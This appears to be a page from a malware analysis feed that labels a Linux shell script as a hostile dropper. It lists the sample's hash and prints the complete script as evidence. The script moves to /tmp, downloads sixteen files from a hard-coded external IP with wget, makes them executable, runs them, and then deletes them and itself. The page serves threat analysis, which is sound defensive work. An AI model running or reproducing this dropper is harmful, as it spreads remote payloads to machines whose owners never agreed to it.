Hostile 100% linux Download

WSW0

Dropper downloads and executes remote payloads

Self-deleting external-IP loop dropperExternal-IP loop download chmod and execute
SHA-2561c35bb9e30c7b7b2a8f468de3562c8120bb284613465bf71a644a328e09e2f8d

Evidence

External-IP loop download chmod and execute lines 1–18
1#!/bin/sh
2n="IKIB KLVP BEZX OPOD PSUQ CMVZ TTGY IPCO GBEG NHJA BMSR WJHB ZSPE VGVS PTHP VCCV"
3if [ $# -gt 0 ]; then
4 n=$@
5fi
6cd /tmp
7for a in $n
8do
9 rm $a
10 wget http://216.107.139.197/$a
11 chmod +x $a
12 ./$a
13done
14for a in $n
15do
16 rm -rf $a
17done
18rm $0

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.